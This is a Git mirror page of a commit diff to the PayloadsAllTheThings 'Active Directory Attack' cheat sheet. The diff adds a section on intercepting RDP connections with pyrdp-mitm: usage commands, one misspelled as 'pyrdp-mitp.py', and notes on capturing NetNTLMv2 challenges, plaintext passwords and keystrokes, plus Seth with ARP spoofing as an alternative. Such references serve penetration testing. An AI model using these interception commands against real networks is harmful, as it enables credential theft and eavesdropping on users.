Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-14 07:12:54 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #572 from sebch-/patch-3

Browse source 
Update Active Directory Attack.md
This commit is contained in:
Swissky 2022-10-12 21:42:34 +02:00 committed by GitHub
commit 31363e016b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
Methodology and Resources/Active Directory Attack.md
View file

@ -2219,6 +2219,21 @@ secretsdump.py -k -no-pass target.lab.local
# IP of PC1: 10.0.0.4 # IP of PC1: 10.0.0.4
``` ```
#### Man-in-the-middle RDP connections with pyrdp-mitm
* https://github.com/GoSecure/pyrdp
* https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/
* Usage
```sh
pyrdp-mitm.py <IP>
pyrdp-mitp.py <IP>:<PORT> # with custom port
pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
```
* Exploitation
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
* If NLA is disabled, you will obtain the password in plaintext
* Other features are available such as keystroke recording
* Alternatives
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener
### Active Directory Certificate Services ### Active Directory Certificate Services